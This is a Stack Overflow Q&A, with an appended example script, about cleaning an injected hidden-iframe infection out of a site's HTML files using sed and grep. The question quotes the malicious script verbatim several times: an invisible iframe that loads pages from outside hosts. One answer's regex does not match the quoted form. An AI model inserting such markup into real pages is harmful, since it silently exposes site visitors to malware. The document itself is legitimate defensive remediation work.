Question
I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.
The strings are:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
I can't seem to figure out how to escape the various characters in those lines...
If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing html </body> in the .html files as well.
So I need to be able to match this entire line in sed:
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
Any help would be greatly appreciated!
Answer 1:
You can try doing this:
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*
This will delete all lines containing vidintex.com/includes/class.pop.php
Answer 2:
You may start using SMScanner at sourceforge! It will solve your problems instantly
Answer 3:
Similar to Looking for script to delete iframe malware from linux server, you can look for the script tag that is placed next to the final body tag and replace that with just the body tag. This script will find all the affected files and remove the final script.
It has the potential that it might find genuine files with scripts at the end - so first check that the grep for files only finds infected files.
# grep recursively for text
# escape all spaces in file names (the backslash is doubled so sed emits a literal "\ " for xargs)
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'
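An added example, not part of any answer above: one way to delete only the injected `<script>` element, so that a `</body>` sharing the same line survives, with the original of each edited file kept as `FILE.bak`. The function names and the sample pages are constructed for illustration. It assumes the injection has exactly the form quoted in the question and that sed accepts `-i.bak` (GNU sed).

```shell
#!/bin/sh
# Added example: remove only the injected hidden-iframe <script> element and
# keep everything else on the line (for instance a trailing </body>).

MARKER='vb_style_forum'
# BRE for the whole injected element. The iframe URL is matched by [^>]*, so
# one expression covers every variant shown in the question. '#' is the sed
# delimiter below, so the slashes in </style> and </iframe> need no escaping.
PATTERN="<script>document\.write('<style>\.vb_style_forum [^<]*</style><div class=\"vb_style_forum\"><iframe [^>]*></iframe></div>');</script>"

# clean_injected DIR: edit in place every file under DIR that contains MARKER,
# keeping the original as FILE.bak, and print the path of each file touched.
# find -exec passes each path as one argument, so spaces in names are safe.
clean_injected() {
    find "$1" -type f ! -name '*.bak' \
        -exec grep -q -F "$MARKER" {} \; \
        -exec sed -i.bak "s#$PATTERN##g" {} \; \
        -print
}

# make_sample DIR: write constructed test pages (not real site content).
make_sample() {
    inj="<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class=\"vb_style_forum\"><iframe height=\"150\" width=\"200\" src=\"http://vidintex.com/includes/class.pop.php\"></iframe></div>');</script>"
    printf '<html><body>\n<p>hi</p>\n%s</body>\n</html>\n' "$inj" > "$1/infected page.html"
    printf '<html><body>\n<script src="app.js"></script></body>\n</html>\n' > "$1/clean.html"
}

# Run as: sh clean.sh /path/to/webroot
if [ "$#" -gt 0 ]; then
    clean_injected "$1"
fi
```

Running `grep -rl vb_style_forum` over the tree afterwards lists any file where the marker remains because the injection differs from the quoted form (the `.bak` copies will also appear in that list).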
Source: https://stackoverflow.com/questions/13040532/cleaning-up-iframe-malware